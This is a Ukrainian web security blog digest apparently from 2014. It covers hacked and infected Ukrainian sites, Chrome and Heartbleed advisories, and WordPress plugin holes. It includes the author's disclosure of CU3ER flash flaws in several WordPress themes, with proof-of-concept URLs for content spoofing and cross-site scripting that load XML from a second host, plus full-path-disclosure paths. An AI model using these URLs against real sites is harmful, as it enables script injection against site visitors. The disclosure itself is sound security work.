Websecurity - Веб безпека

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://dazo.gov.ua (хакером Gabby) - 10.03.2014 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://vrada.gov.ua (хакером Gabby) - 07.04.2014 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://riddle.org.ua (хакером Hmei7) - 02.03.2014, зараз сайт вже виправлений адмінами
• http://buller.net.ua (хакерами з 1923Turk Grup)
• http://www.skypark.com.ua (хакером mustireiS) - 07.03.2014, зараз сайт вже виправлений адмінами

Виявлені численні уразливості безпеки в Google Chrome та Chromium.

Уразливі продукти: Google Chrome 34.0, Chromium 34.0.

Міжсайтовий скриптінг, цілочисленні переповнення, DoS, пошкодження пам’яті, підміна URL.

• chromium-browser security update (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах OptimizePress, FormCraft та PhotoSmash Galleries. Для котрих з’явилися експлоіти. OptimizePress - це тема движка, FormCraft - це плагін для створення форм, PhotoSmash Galleries - це плагін для створення галерей зображень.

• WordPress OptimizePress Theme File Upload (деталі)
• WordPress FormCraft Premium SQL Injection (деталі)
• WordPress Photosmash Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

У квітні, 08.04.2014, через півтора місяці після виходу Google Chrome 33, вийшов Google Chrome 34.

В браузері зроблено декілька нововведень. А також виправлена 31 уразливість. 21 з яких позначені як небезпечні та 10 як помірні.

14 уразливостей виявлені співробітниками Google у процесі внутрішнього аудиту кодової бази.

• Выпуск web-браузера Chrome 34 (деталі)

Продовжуючи розпочату традицію, після попереднього відео про 0day уразливість в Mozilla Firefox, пропоную нове відео на веб секюріті тематику. Цього разу відео про атаки на інтерфейс користувача браузера. Рекомендую подивитися всім хто цікавиться цією темою.

HITB2013AMS D2T2 Rosario Valotta - Abusing Browser User Interfaces for Fun and Profit

Торік на конференції Hack In The Box (HITB2013) в Амстердамі відбувся виступ Rosario Valotta. В своєму виступі він розповів про атаки на інтерфейс користувача браузера. Коли використовуючи соціальну інженерію та особливості UI браузерів можна проводити атаки на користувачів.

Розаріо розповів про різні аспекти таких атак в різних популярних браузерах. Рекомендую подивитися дане відео для розуміння сучасних загроз в Інтернеті.

В даній добірці уразливості в веб додатках:

• Juniper Secure Access XSS Vulnerability (деталі)
• SAMSPADE 1.14 BUFFER OVERFLOW (деталі)
• LiveZilla 5.1.2.0 Insecure password storage (деталі)
• LiveZilla 5.1.2.0 PHP Object Injection (деталі)
• HP Service Manager and HP ServiceCenter, Cross Site Scripting (XSS) and Disclosure of Information (деталі)

Раніше я писав про уразливості в CU3ER. У квітні, 19.04.2014, я виявив Content Spoofing, Cross-Site Scripting та Full path disclosure уразливості в численних темах з CU3ER для WordPress. Ця флешка використовується на мільйоні сайтів і в багатьох плагінах для різних CMS. Про що найближчим часом повідомлю розробникам даних плагінів.

Окрім плагінів, про які я писав, флешка CU3ER також міститься в наступних шаблонах для WordPress: ShapeShifter, Los Angeles, Themebox, Elite Force, Webfolio та інших темах, в тому числі платних і кастом темах розроблених для окремих сайтів.

Content Spoofing (WASC-12):

ShapeShifter:

http://site/wp-content/themes/shapeshifter/library/cu3er/cu3er.swf?xml=http://site2/1.xml
http://site/wp-content/themes/shapeshifter2/library/cu3er/cu3er.swf?xml=http://site2/1.xml

Los Angeles:

http://site/wp-content/themes/los_angeles/assets/flash/cu3er.swf?xml=http://site2/1.xml

Themebox:

http://site/wp-content/themes/themebox/cu3er/cu3er.swf?xml=http://site2/1.xml
Директорія також може називатися themebox10 і themebox11

Elite Force:

http://site/wp-content/themes/elite_force/lib/includes/cu3er/cu3er.swf?xml=http://site2/1.xml
http://site/wp-content/themes/elite_force/inc/cu3er/cu3er.swf?xml=http://site2/1.xml

Webfolio:

http://site/wp-content/themes/webfolio/cu3er/cu3er.swf?xml=http://site2/1.xml

Cross-Site Scripting (WASC-08):

ShapeShifter:

http://site/wp-content/themes/shapeshifter/library/cu3er/cu3er.swf?xml=http://site2/xss.xml
http://site/wp-content/themes/shapeshifter2/library/cu3er/cu3er.swf?xml=http://site2/xss.xml

Los Angeles:

http://site/wp-content/themes/los_angeles/assets/flash/cu3er.swf?xml=http://site2/xss.xml

Themebox:

http://site/wp-content/themes/themebox/cu3er/cu3er.swf?xml=http://site2/xss.xml
Директорія також може називатися themebox10 і themebox11

Elite Force:

http://site/wp-content/themes/elite_force/lib/includes/cu3er/cu3er.swf?xml=http://site2/xss.xml
http://site/wp-content/themes/elite_force/inc/cu3er/cu3er.swf?xml=http://site2/xss.xml

Webfolio:

http://site/wp-content/themes/webfolio/cu3er/cu3er.swf?xml=http://site2

1.xml:

cu3er-1.xml

xss.xml:

cu3er-2.xml

Для атаки між доменами потрібен crossdomain.xml на сайті з xml-файлами.

Full path disclosure (WASC-13):

FPD в php-файлах шаблонів (по замовчуванню) або в error_log. В index.php та інших php-файлах.

http://site/wp-content/themes/shapeshifter/
http://site/wp-content/themes/shapeshifter2/
http://site/wp-content/themes/los_angeles/
http://site/wp-content/themes/themebox/
http://site/wp-content/themes/themebox10/
http://site/wp-content/themes/themebox11/
http://site/wp-content/themes/elite_force/
http://site/wp-content/themes/webfolio/

Уразливі всі шаблони з флешкою CU3ER: ShapeShifter 1.x і 2.x, Los Angeles, Themebox 1.1, Elite Force 2.1.0, Webfolio 2.0.2 та попередні версії цих тем.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://zmr.gov.ua - інфікований державний сай - інфекція була виявлена 03.02.2014. Зараз сайт не входить до переліку підозрілих.
• http://infocom.lviv.ua - інфекція була виявлена 21.04.2014. Зараз сайт не входить до переліку підозрілих.
• http://tazoxox.pp.ua - інфекція була виявлена 19.04.2014. Зараз сайт не входить до переліку підозрілих.
• http://join.com.ua - інфекція була виявлена 19.03.2014. Зараз сайт не входить до переліку підозрілих.
• http://eizvestia.com - інфекція була виявлена 19.03.2014. Зараз сайт не входить до переліку підозрілих.

12.04.2014

Виявлені уразливості безпеки в OpenSSL. Зокрема одна уразливість дозволяє провести Heartbleed атаку, що дозволяє отримати секретний ключ шифрування на веб сервері і розшифрувати SSL трафік. Що зараз активно використовується для атак в Інтернеті.

Уразливі версії: OpenSSL 1.0.

Витік інформації, відновлення ключа.

• OpenSSL vulnerabilities (деталі)

22.04.2014

Додаткова інформація.

• FreeBSD Security Advisory FreeBSD-SA-14:06.openssl (деталі)
• HP Software Autonomy WorkSite Server (On-Premises Software), Running OpenSSL, Remote Disclosure of Information (деталі)
• HP Autonomy WorkSite Server v9.0 (деталі)
• HP XP P9500 Disk Array running OpenSSL, Remote Disclosure of Information (деталі)
• HP System Management Homepage (SMH) running OpenSSL on Linux and Windows, Remote Disclosure of Information (деталі)
• HP Smart Update Manager (SUM) running OpenSSL, Remote Disclosure of Information (деталі)
• HP BladeSystem c-Class Onboard Administrator (OA) running OpenSSL, Remote Disclosure of Information (деталі)
• HP Software Server Automation, “HeartBleed” OpenSSL Vulnerability, Remote Disclosure of Information (деталі)
• HP Software Service Manager, “HeartBleed” OpenSSL Vulnerability, Remote Disclosure of Information (деталі)
• OpenSSL 1.0.1 library’s “Heart bleed” vulnerability - CVE-2014-0160 (деталі)
• HP Software HP Service Manager, Asset Manager, UCMDB Browser, Executive Scorecard, Server Automation, Diagnostics, LoadRunner, Performance Center, “HeartBleed” OpenSSL Vulnerability, Remote Disclosure (деталі)

В даній добірці експлоіти в веб додатках:

• Oracle Demantra 12.2.1 - Stored XSS Vulnerability (деталі)
• Oracle Demantra 12.2.1 - Database Credentials Disclosure (деталі)
• Kloxo Remote Root Exploit (деталі)
• HP Data Protector EXEC_BAR Remote Command Execution (деталі)
• Dexter (CasinoLoader) SQL Injection Exploit (деталі)